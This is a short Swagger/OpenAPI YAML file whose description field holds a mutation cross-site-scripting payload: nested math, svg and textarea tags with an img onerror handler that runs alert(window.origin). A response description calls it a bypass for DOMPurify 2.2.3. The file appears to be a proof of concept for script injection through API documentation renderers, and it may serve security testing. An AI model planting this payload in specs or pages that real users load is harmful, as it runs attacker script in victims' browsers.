swagger: '3.0'
info:
  title: AbdulRahman
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: bypass for DomPurify version 2.2.3 
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
